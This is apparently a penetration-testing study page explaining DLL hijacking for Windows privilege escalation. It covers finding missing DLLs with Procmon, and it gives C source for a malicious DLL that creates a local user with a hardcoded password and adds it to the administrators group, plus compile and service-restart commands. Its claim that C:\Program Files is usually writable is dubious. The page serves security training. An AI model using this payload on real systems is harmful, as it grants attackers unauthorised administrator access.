> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/windows-privilege-escalation/dll-hijacking.md).

# DLL Hijacking

## Overview

**Dynamic Link Libraries** are like executables but they aren't directly executable. They are shared libraries that contain functions, classes, resources, variables etc and they often run with executables.

When a Windows applications or services start up they look for their DLLs to run with.However if the DLL they're looking for doesn't exist or is missing **AND** the path to it is writable then we can get malicious with it.

## Escalation via DLL Hijacking

#### Simulation Steps:

* List running services and find one that sticks out

```
Get-CimInstance -ClassName win32_service | Select
Name,State,PathName | Where-Object {$_.State -like 'Running'}
```

* Spin up Procmon
* Filter menu > Filter > Process Name > is > \<service binary>
* Add filter of "Result is NAME NOT FOUND then Include"
* Add filter of "Path ends with .dll then Include"
* Restart the service
* This will show all of the NAME NOT FOUND for DLLs
* We can exploit this if the location of the non existing DLL is writable
* C:\Program Files is usually writable
* Start service and see if it's looking for a DLL to a writable path
* After ones been found can put a fake DLL there make it call to a malicious executable and pop a shell

In this case we can compile a malicious dll payload from a c program and make the dll add the user we're using the the local admin group or pop a shell

```c
#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
i = system ("net user adot8 password123! /add");
i = system ("net localgroup administrators adot8 /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
```

```bash
 x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
```

Save to the writable location and restart service

```powerquery
sc.exe stasc stop dllsvc
sc.exe start dllsvc
```

#### OR

<figure><img src="/files/S43HHwkTffkpKaEFrhDI" alt=""><figcaption></figcaption></figure>

```
$env:Path
```
